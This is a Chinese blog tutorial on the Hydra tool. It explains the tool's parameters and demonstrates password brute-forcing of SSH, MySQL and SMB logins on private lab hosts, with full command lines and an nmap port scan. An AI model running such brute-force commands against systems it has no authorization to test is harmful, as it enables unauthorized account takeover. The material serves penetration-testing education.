穷举篇(五)之Hydra端口服务穷举

本文介绍了Hydra工具的使用方法,包括基本参数解释和针对SSH、MySQL、SMB服务的穷举攻击实例。Hydra是一个端口扫描和密码破解工具,支持多种服务协议,如telnet、ftp、smtp等。通过指定目标IP、服务类型、用户字典和密码字典,可以进行多线程并发攻击,快速寻找有效的用户名和密码组合。
摘要由CSDN通过智能技术生成

一、hydra 密码穷举工具的使用

1、简介

hydra 是一个端口穷举服务的工具。
adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post}
http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s]
ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener
oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap
rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak
telnet[s] vmauthd vnc xmpp

2、参数说明

常用参数说明
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]
-R
继续从上一次进度接着破解
-S
大写,采用 SSL 链接
-s <PORT>
小写,可通过这个参数指定非默认端口
-l <LOGIN>
指定破解的用户,对特定用户破解。
-L <FILE>
指定用户名字典
-p <PASS>
小写,指定密码破解,少用,一般是采用密码字典。
-P <FILE>
大写,指定密码字典。
-e <ns>
可选选项,n:空密码试探,s:使用指定用户和密码试探
-C <FILE>
使用冒号分割格式,例如“登录名:密码”来代替-L/-P 参数
-M <FILE>
指定目标列表文件一行一条。
-o <FILE>
指定结果输出文件。
-f
在使用-M 参数以后,找到第一对登录名或者密码的时候中止破解。
-t <TASKS>
同时运行的线程数,默认为 16
-w <TIME>
设置最大超时的时间,单位秒,默认是 30s
-v / -V
显示详细过程
server
目标 ip
service
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3
mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn
icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp
等等
OPT
可选项

二、hydra 穷举 ssh 服务

1、实验演示

┌──(steven㉿kali)-[~]
└─$ hydra -l root -P /home/steven/penetra_test/top1000.txt -e ns -vV -f 192.168.1.46 ssh -t 1 

在这里插入图片描述

三、hydra 穷举 mysql 服务

1、实验演示

hydra ip mysql -l 用户名 -P 密码字典 -t 线程(默认 16) -vV
hydra ip mysql -l 用户名 -P 密码字典 -e ns -vV
hydra ip mysql -l 用户名 -P 密码字典 -e ns -vV -s 端口
hydra -l root -P /home/steven/penetra_test/top1000.txt -e ns -vV -f 192.168.1.43 mysql -o /home/steven/penetra_test/mysql.txt

在这里插入图片描述

四、hydra 穷举 smb 服务

1、实验演示

PS C:\Users\Administrator> net share

共享名       资源                            注解

-------------------------------------------------------------------------------
C$           C:\                             默认共享
IPC$                                         远程 IPC
ADMIN$       C:\Windows                      远程管理
命令成功完成。
┌──(steven㉿kali)-[~/penetra_test]
└─$ nmap -p 445 192.168.1.43
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-30 23:41 CST
Nmap scan report for 192.168.1.43
Host is up (0.0016s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
┌──(steven㉿kali)-[~/penetra_test]
└─$ hydra -l administrator -P top1000.txt -e ns -vV -f 192.168.1.43 smb -o smb.txt

在这里插入图片描述在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值